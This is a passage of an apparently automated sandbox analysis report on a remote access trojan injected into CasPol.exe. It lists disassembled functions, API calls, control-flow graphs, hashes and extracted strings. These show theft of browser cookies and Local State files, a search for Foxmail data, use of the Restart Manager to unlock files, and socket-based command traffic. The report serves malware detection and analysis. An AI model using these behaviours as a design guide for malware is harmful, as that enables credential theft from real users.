                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FE1F1B5900214AEFB14CF64DC85FEEB7B8EB05394F848195F609A7086D372AB49CF64
                                                                                                                                                                                                                                  Function 00413FD4 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 813sleepnetworkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 612 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 625 414021-414028 Sleep 612->625 626 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 612->626 625->626 641 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 626->641 642 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 626->642 695 41419a-4141a1 641->695 696 41418c-414198 641->696 642->641 697 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 695->697 696->697 724 414244-414254 WSAGetLastError call 41bc76 697->724 725 41428f-41429d call 4041f1 697->725 728 414259-41428a call 404c9e call 401f66 call 41a686 call 401eea 724->728 731 4142ca-4142df call 404915 call 40428c 725->731 732 41429f-4142c5 call 401f66 * 2 call 41a686 725->732 748 414b54-414b66 call 4047eb call 4020b4 728->748 747 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 731->747 731->748 732->748 812 414434-414441 call 40541d 747->812 813 414446-41446d call 401e8f call 412513 747->813 761 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 748->761 762 414b8e-414b96 call 401d8c 748->762 761->762 762->641 812->813 819 414474-4145a8 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 813->819 820 41446f-414471 813->820 855 4145ad-414ac7 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 819->855 820->819 1066 414ac9-414ad0 855->1066 1067 414adb-414ae2 855->1067 1066->1067 1068 414ad2-414ad4 1066->1068 1069 414ae4-414ae9 call 40a767 1067->1069 1070 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 1067->1070 1068->1067 1069->1070 1081 414b22-414b2e CreateThread 1070->1081 1082 414b34-414b4f call 401eea * 2 call 401e13 1070->1082 1081->1082 1082->748
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                                                                  • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-EC111K$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                                                                                                                                  • API String ID: 524882891-2209054499
                                                                                                                                                                                                                                  • Opcode ID: c5bc1d6d1b6c3047afbd33f1437955fe0c167a04afa276ca49836680c978097d
                                                                                                                                                                                                                                  • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5bc1d6d1b6c3047afbd33f1437955fe0c167a04afa276ca49836680c978097d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                                                                                                                                                                  Function 10007240 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,10006E4E), ref: 10007252
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000725B
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,10006E4E), ref: 1000726C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000726F
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,10006E4E), ref: 10007286
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 10007289
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,10006E4E), ref: 1000729A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000729D
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,10006E4E), ref: 100072AE
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 100072B1
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,10006E4E), ref: 100072C2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 100072C5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                                                  • String ID: GetFinalPathNameByHandleW$NtQueryInformationProcess$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$Rstrtmgr$Rstrtmgr$Rstrtmgr$kernel32$ntdll
                                                                                                                                                                                                                                  • API String ID: 4236061018-788455005
                                                                                                                                                                                                                                  • Opcode ID: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                  • Instruction ID: 04275e680396dfb4a641f74b6e8e1366635206651eabc041964a765234593f91
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38111F74C01228E9FA61FBF19CEDFA73A98FB40290FA10416F60953060C738564ADF94
                                                                                                                                                                                                                                  Function 10001F42 Relevance: 33.7, APIs: 9, Strings: 10, Instructions: 472fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1097 10001f42-10001f98 call 10004330 CreateDirectoryW call 10004d80 * 2 1104 10001f9a 1097->1104 1105 10001f9c-10001fa0 1097->1105 1104->1105 1106 10001fa2 1105->1106 1107 10001fa4-10001fb4 CopyFileW 1105->1107 1106->1107 1108 10001fc0-10001fe1 1107->1108 1109 10001fb6-10001fbb call 10004160 1107->1109 1111 10001ff0-10002052 call 10003a70 call 100067d0 1108->1111 1112 10001fe3-10001feb call 10004160 1108->1112 1109->1108 1120 100024f0-10002514 call 100038d0 1111->1120 1121 10002058-1000205a 1111->1121 1112->1111 1127 10002523-10002546 1120->1127 1128 10002516-1000251e call 10004160 1120->1128 1122 10002060-10002098 call 10004d80 1121->1122 1129 10002590-1000259a call 1000a5c6 1122->1129 1130 1000209e-100020cf call 10004e80 call 10004cc0 1122->1130 1132 10002552-1000256c 1127->1132 1133 10002548-1000254d call 10004160 1127->1133 1128->1127 1144 100020d1-100020d6 call 10004160 1130->1144 1145 100020db-100020f9 1130->1145 1137 10002578-1000258a 1132->1137 1138 1000256e-10002573 call 10004160 1132->1138 1133->1132 1138->1137 1144->1145 1146 10002105-1000214e call 10004d80 1145->1146 1147 100020fb-10002100 call 10004160 1145->1147 1146->1129 1152 10002154-10002173 call 10004e80 1146->1152 1147->1146 1155 10002175-1000217a call 10004160 1152->1155 1156 1000217f-100021c9 call 10004d80 call 10004cc0 1152->1156 1155->1156 1162 100021d5-1000227c CreateDirectoryW * 2 call 10004330 call 10004d80 * 2 1156->1162 1163 100021cb-100021d0 call 10004160 1156->1163 1162->1129 1171 10002282-100022b0 call 10004e80 call 10004cc0 1162->1171 1163->1162 1176 100022b2 1171->1176 1177 100022b4-100022b8 1171->1177 1176->1177 1178 100022ba 1177->1178 1179 100022bc-100022ce CopyFileW 1177->1179 1178->1179 1180 100022d0-100022d5 call 10004160 1179->1180 1181 100022da-100022f4 1179->1181 1180->1181 1183 10002300-1000231d 1181->1183 1184 100022f6-100022fb call 10004160 1181->1184 1186 1000232c-10002356 1183->1186 1187 1000231f-10002327 call 10004160 1183->1187 1184->1183 1189 10002365-1000238c CopyFileW 1186->1189 1190 10002358-10002360 call 10004160 1186->1190 1187->1186 1192 10002392-100023e8 call 10006e60 CreateFileW 1189->1192 1193 1000244e-10002454 1189->1193 1190->1189 1201 10002405-1000240b 1192->1201 1202 100023ea-100023ff WriteFile CloseHandle 1192->1202 1194 10002460-1000247d 1193->1194 1195 10002456-1000245b call 10004160 1193->1195 1197 1000248c-100024b6 1194->1197 1198 1000247f-10002487 call 10004160 1194->1198 1195->1194 1204 100024c5-100024ea 1197->1204 1205 100024b8-100024c0 call 10004160 1197->1205 1198->1197 1206 1000244b 1201->1206 1207 1000240d-10002416 1201->1207 1202->1201 1204->1120 1204->1122 1205->1204 1206->1193 1209 10002442-10002448 call 1000a956 1207->1209 1210 10002418-1000241b 1207->1210 1209->1206 1211 10002421-10002426 1210->1211 1212 1000258b call 1000daab 1210->1212 1211->1212 1215 1000242c-10002431 1211->1215 1212->1129 1215->1212 1217 10002437-1000243a 1215->1217 1217->1212 1218 10002440 1217->1218 1218->1209
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000000FF,?,00000000), ref: 10001F5F
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 10001FA8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CopyCreateDirectoryFile
                                                                                                                                                                                                                                  • String ID: Network$User Data$\Cookies$\Local State$\Local State$\Network\Cookies$\Secure Preferences$\Secure Preferences$invalid vector<T> subscript$-
                                                                                                                                                                                                                                  • API String ID: 3761107634-3418363220
                                                                                                                                                                                                                                  • Opcode ID: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                  • Instruction ID: d59edb435599a471555a78990484bb1f50df8ad1d5918936d629013e8b7aebb2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20028AB0D002189FEF04CFA4DC85BEEBBB5FF58344F114499E80AAB255DB74AA85CB51
                                                                                                                                                                                                                                  Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1219 411c81-411cca GetModuleFileNameW call 401faa * 3 1226 411ccc-411d56 call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea call 41ab38 call 401e8f call 40c854 call 401eea 1219->1226 1251 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1226->1251 1274 411df8 1251->1274 1275 411dea-411df2 Sleep 1251->1275 1276 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1274->1276 1275->1251 1275->1274 1299 411e9a 1276->1299 1300 411e8c-411e94 Sleep 1276->1300 1301 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1299->1301 1300->1276 1300->1299 1324 411f3c-411f60 1301->1324 1325 411f2e-411f36 Sleep 1301->1325 1326 411f64-411f80 call 401e07 call 41b61a 1324->1326 1325->1301 1325->1324 1331 411f82-411f91 call 401e07 DeleteFileW 1326->1331 1332 411f97-411fb3 call 401e07 call 41b61a 1326->1332 1331->1332 1339 411fd0 1332->1339 1340 411fb5-411fce call 401e07 DeleteFileW 1332->1340 1341 411fd4-411ff0 call 401e07 call 41b61a 1339->1341 1340->1341 1348 411ff2-412004 call 401e07 DeleteFileW 1341->1348 1349 41200a-41200c 1341->1349 1348->1349 1351 412019-412024 Sleep 1349->1351 1352 41200e-412010 1349->1352 1351->1326 1355 41202a-41203c call 408339 1351->1355 1352->1351 1354 412012-412017 1352->1354 1354->1351 1354->1355 1358 412092-4120b1 call 401e13 * 3 1355->1358 1359 41203e-41204c call 408339 1355->1359 1370 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1358->1370 1359->1358 1365 41204e-41205c call 408339 1359->1365 1365->1358 1371 41205e-41208a Sleep call 401e13 * 3 1365->1371 1391 412125-41226f call 41aec8 call 41ad46 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1370->1391 1392 412274-41236b call 41aec8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1370->1392 1371->1226 1385 412090 1371->1385 1385->1370 1461 41236f-4123cf call 401eea call 401e13 call 401eea * 7 1391->1461 1392->1461 1491 4123d4-4123f6 call 401eea * 2 1461->1491
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                                                                  • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                                                                                                  • API String ID: 1223786279-3931108886
                                                                                                                                                                                                                                  • Opcode ID: 06025618dadcd7d40aa47030923b525a7e8dcdff4ba1033b0233db54cf45cc6a
                                                                                                                                                                                                                                  • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06025618dadcd7d40aa47030923b525a7e8dcdff4ba1033b0233db54cf45cc6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                                                                                                                                                  Function 045712EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 04571434
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 04571137
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571151
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457115C
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457116D
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457117C
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571193
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 045711D0
                                                                                                                                                                                                                                    • Part of subcall function 045710F1: FindClose.KERNEL32(00000000), ref: 045711DB
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 045714C5
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 045714E0
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 0457150F
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 04571521
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 04571547
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 04571553
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 04571579
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 04571585
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 045715AB
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 045715B7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                  • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                  • Opcode ID: b09f43ea88173dcc2ff2e8e8733a30cbaeb126af30d0742761612dfa9c7dde67
                                                                                                                                                                                                                                  • Instruction ID: ea26ba6f626c5803792fed86797aa9fdda715a209dafe9174ec84cad55d08e66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b09f43ea88173dcc2ff2e8e8733a30cbaeb126af30d0742761612dfa9c7dde67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A81A671A4036866EB20D7A0EC45FDE777DFF84704F0015AAF508E7190EAB16A85CF55
                                                                                                                                                                                                                                  Function 100086B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 195networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1534 100086b0-100086c0 1535 100086c2-100086c7 1534->1535 1536 1000870b-10008712 1534->1536 1537 10008911-10008915 1535->1537 1538 100086cd-10008708 select 1535->1538 1539 100087a0-100087d0 call 100097d0 recv 1536->1539 1540 10008718-10008762 1536->1540 1545 100087f1-100087f4 1539->1545 1546 100087d2-100087dd WSAGetLastError 1539->1546 1542 10008774-10008798 select 1540->1542 1543 10008764-1000876a 1540->1543 1542->1539 1543->1542 1549 100087f6-100087fe call 100097d0 1545->1549 1550 1000880b-10008840 call 100097d0 closesocket call 1000dd3f call 1000fc8d 1545->1550 1547 10008800-10008809 call 100097d0 1546->1547 1548 100087df-100087ea WSAGetLastError 1546->1548 1559 10008843-10008849 1547->1559 1548->1547 1551 100087ec-100087ef 1548->1551 1549->1539 1550->1559 1551->1545 1561 100088f1-100088f9 1559->1561 1562 1000884f 1559->1562 1561->1537 1565 100088fb-100088ff 1561->1565 1564 10008850-10008869 send 1562->1564 1567 10008885 1564->1567 1568 1000886b-10008878 WSAGetLastError 1564->1568 1565->1537 1569 10008901-1000890a closesocket 1565->1569 1571 100088c1-100088ee closesocket call 1000dd3f call 1000fc8d 1567->1571 1572 10008887-10008891 1567->1572 1568->1561 1570 1000887a-10008881 WSAGetLastError 1568->1570 1569->1537 1570->1561 1574 10008883 1570->1574 1571->1561 1575 10008893-10008896 1572->1575 1576 1000889d-1000889f 1572->1576 1574->1567 1575->1576 1578 10008898-1000889b 1575->1578 1579 100088a1-100088b4 call 1000b3c0 1576->1579 1580 100088b7-100088bd 1576->1580 1578->1580 1579->1580 1580->1564 1582 100088bf 1580->1582 1582->1561
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • select.WS2_32(00000000,00000000,00000000,00000000,?), ref: 100086FE
                                                                                                                                                                                                                                  • select.WS2_32(?,00000001,00000000,00000000,?), ref: 10008792
                                                                                                                                                                                                                                  • recv.WS2_32(?,?,000005DC,00000000), ref: 100087C5
                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 100087D2
                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 100087DF
                                                                                                                                                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 1000885F
                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 10008871
                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 1000887A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$select$recvsend
                                                                                                                                                                                                                                  • String ID: Connection closed!$Connection error!
                                                                                                                                                                                                                                  • API String ID: 4255854023-2305758303
                                                                                                                                                                                                                                  • Opcode ID: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                  • Instruction ID: ed442c2dc6cb281fd35b63cc094b2b61bff5b4e8b3b3f7628600f1f37b8170a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56719272A0060AAFE704DF64CC89B59B7B8FF54380F548226E549D6A55DB70FA90CF90
                                                                                                                                                                                                                                  Function 1000267B Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 337sleepprocesssynchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 100076D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                    • Part of subcall function 100076D0: Process32FirstW.KERNEL32(00000000,?), ref: 10007744
